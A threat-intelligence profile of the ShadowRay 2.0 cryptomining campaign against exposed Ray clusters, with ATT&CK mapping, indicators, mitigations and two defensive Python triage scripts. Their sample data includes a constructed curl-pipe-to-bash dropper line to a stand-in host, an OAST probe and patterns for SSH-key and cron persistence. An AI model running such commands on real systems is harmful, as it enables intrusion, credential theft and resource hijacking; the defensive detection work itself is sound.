# Tool/Technique: ShadowRay 2.0
## Overview
ShadowRay 2.0 is a cryptomining campaign that specifically targets Ray clusters where the dashboard or Jobs API is exposed without proper authentication. The campaign utilizes various techniques for discovery, achieving remote code execution (RCE), lateral movement within the cluster, credential theft, and establishing persistence, ultimately co-opting the computing resources for cryptojacking and data exfiltration.
## Technical Details
- Type: Campaign / Malware framework (Involves multiple custom and known malicious components)
- Platform: Linux (Implied by ELF loaders, cron/systemd persistence, and targeting components like Ray)
- Capabilities: Out-of-band discovery, RCE via job submission, lateral movement via legitimate orchestration, cryptojacking, persistence setup, data exfiltration, worm-like propagation.
- First Seen: November 19, 2025 (as per public report date)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
  - T1190 - Exploit Public-Facing Application (Leveraging unauthenticated Ray APIs, linked to CVE-2023-48022)
- TA0008 - Lateral Movement
  - T1021 - Remote Services (Abusing Ray's NodeAffinitySchedulingStrategy to push jobs across nodes)
- TA0003 - Persistence
  - T1136 - Create Account (Adding SSH keys)
  - T1053.001 - Scheduled Task/Job: Cron
  - T1053.005 - Scheduled Task/Job: Scheduled Task
- TA0005 - Defense Evasion
  - T1036.005 - Match Legitimate Name or Location (Process masquerading, e.g., `kworker/0:0`, `dns-filter`, `.python3.6`)
- TA0009 - Collection
  - T1004 - Data from Local System (Exfiltrating MySQL credentials, cloud tokens, source code)
- TA0011 - Command and Control
  - T1071.001 - Application Layer Protocol: Web Protocols (Using GitLab/GitHub releases for C2)
## Functionality
### Core Capabilities
- **Discovery & Validation:** Uses `interact.sh` (oast.fun) to post test jobs to `/api/jobs/` to trigger HTTP/DNS callbacks, identifying exploitable, unauthenticated Ray dashboards.
- **Remote Code Execution (RCE):** Submits multi-stage Bash and Python payloads via Ray jobs, exploiting behavior tracked as CVE-2023-48022.
- **Initial Execution & Reconnaissance:** Payloads gather environment details (CPU/GPU count, cloud context, credentials) and search for secrets (cloud/database).
- **Lateral Movement:** Leverages Ray’s legitimate `NodeAffinitySchedulingStrategy` to push malware jobs to every alive node in the cluster, achieving internal spread without additional exploits.
- **Cryptojacking:** Deploys XMRig and Rigel miners to hijack CPU/GPU resources.
### Advanced Features
- **Worm Capability:** Deploys "ShadowRay probes" to scan and attack new Ray instances, turning the botnet into self-propagating malware targeting AI infrastructure.
- **Persistence Mechanisms:** Creates SSH backdoors (adds SSH keys) and uses cron/systemd services masquerading as health/DNS components (e.g., `run.sh`, `mon.sh`).
- **Stealth and Evasion:**
  - Caps CPU/GPU usage at approximately 60% to avoid performance degradation detection.
  - Hides GPU usage from Ray’s internal metrics.
  - Employs process masquerading (e.g., using names like `kworker/0:0`, `.python3.6`).
  - Kills competing miners.
  - Blocks rival mining pools by modifying `/etc/hosts` and `iptables`.
- **Data Exfiltration:** Steals MySQL credentials, cloud tokens, proprietary AI models, and source code.
- **Additional Malicious Use:** Uses the `sockstress` tool for launching Denial of Service (DDoS) attacks.
- **Evolving C2 Infrastructure:** Initially used GitLab for C2 and payload distribution; migrated to GitHub release artifacts after the GitLab repositories were banned.
## Indicators of Compromise
- File Hashes: (Not specified in the context)
- File Names: `run.sh`, `run-CN.sh`, `mon.sh`, `aa.sh` (Scripts found on compromised nodes)
- Registry Keys: (Not applicable/specified for Linux environments mentioned)
- Network Indicators:
  - Out-of-band testing domain: `oast[.]fun` (used via `interact.sh`)
  - C2/Distribution Platforms: GitLab repositories (initial), GitHub repositories (subsequent)
- Behavioral Indicators:
  - Job submissions to Ray `/api/jobs/`.
  - Creation of new cron jobs/systemd services with obfuscated names.
  - Installation and execution of XMRig or Rigel miners.
  - Modification of `/etc/hosts` to block specific IP ranges/domains.
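The following host-triage helper is an added example, not part of the original report or of any tooling used by the campaign. It turns the behavioral indicators above (rival-pool blocking through sinkholed `/etc/hosts` entries, cron persistence under health/DNS-looking names, and the dropped script names) into checks over the text of `/etc/hosts` and a crontab dump. The sinkhole address set, the `/tmp`/`/dev/shm` heuristic and the sample file contents are constructed assumptions.

```python
"""Triage /etc/hosts and crontab text for ShadowRay 2.0 style artifacts.

Added example (not from the report). Input is plain text, so it can run
offline against copies collected from a node; all sample input below is
constructed for illustration.
"""
import re
from typing import Dict, List

# Addresses used to blackhole a hostname (assumption: the report only says
# /etc/hosts is modified to block rival pools, not which address is used).
SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1"}
# Loopback names that legitimately map to 127.0.0.1 and must not be flagged.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "localhost4", "localhost6"}

# Script names the report lists as found on compromised nodes.
DROPPED_SCRIPTS = re.compile(r"\b(?:run|run-CN|mon|aa)\.sh\b")
# Process/path names the report lists as masquerading (kworker, dns-filter, .python3.6).
MASQUERADE = re.compile(r"kworker/0:0|\bdns-filter\b|\.python3\.6")
# Heuristic (assumption): persistence launched from world-writable scratch space.
SCRATCH_DIRS = re.compile(r"/dev/shm/|/tmp/")


def sinkholed_names(hosts_text: str) -> List[str]:
    """Return hostnames in /etc/hosts that resolve to a sinkhole address."""
    flagged: List[str] = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        ip, *names = line.split()
        if ip in SINKHOLE_IPS:
            flagged.extend(n for n in names if n not in LOCAL_NAMES)
    return flagged


def suspicious_cron_lines(crontab_text: str) -> List[str]:
    """Return crontab entries matching dropped-script, masquerade or scratch-dir patterns."""
    return [
        line for line in crontab_text.splitlines()
        if line.strip() and not line.lstrip().startswith("#")
        and (DROPPED_SCRIPTS.search(line) or MASQUERADE.search(line) or SCRATCH_DIRS.search(line))
    ]


def triage(hosts_text: str, crontab_text: str) -> Dict[str, List[str]]:
    """Bundle both checks into one result for an analyst to review."""
    return {
        "sinkholed_hosts": sinkholed_names(hosts_text),
        "suspicious_cron": suspicious_cron_lines(crontab_text),
    }


# Constructed sample input: a node with two blackholed (fictional) pool domains
# and two cron entries pointing at hidden scratch-space scripts.
SAMPLE_HOSTS = """127.0.0.1 localhost
127.0.1.1 gpu-node-3
0.0.0.0 pool.miningpool.invalid   # constructed, not a real pool
0.0.0.0 xmr.rivalpool.invalid
"""
SAMPLE_CRONTAB = """0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /bin/sh /tmp/.health/mon.sh >/dev/null 2>&1
@reboot /root/.python3.6/run.sh
"""

if __name__ == "__main__":
    for key, hits in triage(SAMPLE_HOSTS, SAMPLE_CRONTAB).items():
        print(key, hits)
```

Feed it the real files from a suspect node (`cat /etc/hosts` and `crontab -l` for root plus per-user crontabs); an empty result is not a clean bill of health, only the absence of these particular indicators.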
## Associated Threat Actors
- 🪙IronErn440
## Detection Methods
- **Signature-based detection:** Signatures for known miner binaries (XMRig, Rigel) or the specific ELF loaders being dropped.
- **Behavioral detection:** Monitoring for jobs submitted to Ray APIs that include shell commands or Python code designed for reconnaissance or deployment, rather than legitimate machine learning tasks. Monitoring for high resource utilization inconsistent with normal Ray activity (even if capped at 60%). Detecting modifications to `/etc/hosts` or `iptables` that block external IPs.
- **YARA rules:** Could be created for the custom script patterns (`run.sh`, etc.) or identified ELF droppers.
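The behavioral detection described above (jobs submitted to the Ray Jobs API that carry shell or reconnaissance logic rather than ML work) can be approximated by scanning the job records the API returns. The code below is an added example, not part of the report or of Ray itself. It assumes job records are dicts with `submission_id`, `entrypoint`, `runtime_env` and `metadata` fields (the shape of Ray's job listing), and the pattern set is a starting point drawn from the indicators in this report, not a complete signature. The sample job records are constructed.

```python
"""Flag suspicious Ray job submissions from Jobs API records.

Added example (not from the report). Applies the report's indicators
(OAST callback domain, download-and-execute pipelines, cron/systemd and
SSH-key persistence, /etc/hosts or iptables tampering, miner names,
dropped script names, masquerade names) to the text of each job record.
"""
import re
from dataclasses import dataclass
from typing import Any, Dict, Iterable, List

# Pattern set is an assumption drawn from the report; tune it per environment.
SUSPICIOUS_PATTERNS = {
    "oast_callback": re.compile(r"oast\.fun|interact\.sh", re.IGNORECASE),
    "download_and_exec": re.compile(r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:ba)?sh\b"),
    "persistence": re.compile(r"\bcrontab\b|/etc/cron|/etc/systemd/system|systemctl\s+(?:enable|daemon-reload)\b"),
    "hosts_or_fw_tamper": re.compile(r"/etc/hosts\b|\biptables\b"),
    "ssh_backdoor": re.compile(r"authorized_keys"),
    "miner": re.compile(r"\bxmrig\b|\brigel\b", re.IGNORECASE),
    "named_script": re.compile(r"\b(?:run|run-CN|mon|aa)\.sh\b"),
    "masquerade": re.compile(r"kworker/0:0|\bdns-filter\b|\.python3\.6"),
}


@dataclass
class Finding:
    job_id: str
    indicators: List[str]


def _strings(value: Any) -> Iterable[str]:
    """Yield every string nested inside a job record (dicts, lists, scalars)."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _strings(v)
    elif isinstance(value, (list, tuple)):
        for v in value:
            yield from _strings(v)


def scan_job(job: Dict[str, Any]) -> List[str]:
    """Return the names of every indicator that fires on one job record."""
    # Only the fields an attacker controls at submission time are inspected.
    text = "\n".join(_strings({k: job.get(k) for k in ("entrypoint", "runtime_env", "metadata")}))
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]


def scan_jobs(jobs: Iterable[Dict[str, Any]]) -> List[Finding]:
    """Scan a job listing and return one Finding per job with at least one hit."""
    findings: List[Finding] = []
    for job in jobs:
        hits = scan_job(job)
        if hits:
            findings.append(Finding(str(job.get("submission_id", "?")), hits))
    return findings


# Constructed sample records: one legitimate training job, one out-of-band
# probe, one dropper-style submission. Hostnames are placeholders.
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_legit01",
     "entrypoint": "python train.py --epochs 10 --batch-size 64",
     "runtime_env": {"pip": ["torch==2.2.0"], "working_dir": "./"},
     "metadata": {"team": "ml-platform"}},
    {"submission_id": "raysubmit_probe02",
     "entrypoint": "python -c \"import urllib.request as u; u.urlopen('http://PLACEHOLDER.oast.fun/')\"",
     "runtime_env": {}, "metadata": {}},
    {"submission_id": "raysubmit_drop03",
     "entrypoint": "bash -c 'curl -fsSL http://dropper.invalid/run.sh | bash; echo 0.0.0.0 pool.invalid >> /etc/hosts'",
     "runtime_env": {}, "metadata": {}},
]

if __name__ == "__main__":
    for f in scan_jobs(SAMPLE_JOBS):
        print(f.job_id, f.indicators)
```

In practice the input would be the JSON list returned by the Jobs API or the dashboard's job history; scanning it on a schedule and alerting on any non-empty finding gives the "anomalous job submission" signal the detection and mitigation sections call for.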
## Mitigation Strategies
- **Authentication Enforcement:** Ensure the Ray dashboard and Jobs API are **not exposed without strict authentication**. This is the primary point of failure targeted by ShadowRay 2.0.
- **Principle of Least Privilege:** Restrict network access to Ray components to trusted internal networks only.
- **Vulnerability Patching:** Apply patches related to CVE-2023-48022 immediately.
- **Runtime Monitoring:** Monitor orchestration systems (like Ray’s scheduler) for anomalous job submissions that include system command execution (Bash/Python running arbitrary code).
- **Network Segmentation:** Isolate compute nodes from external networks where possible.
## Related Tools/Techniques
- **cryptomining malware:** XMRig, Rigel
- **OAST Tool:** interact.sh (oast.fun)
- **Lateral Movement Technique:** Abuse of orchestrator features (`NodeAffinitySchedulingStrategy`) for host-to-host movement.
- **DDoS Tool:** sockstress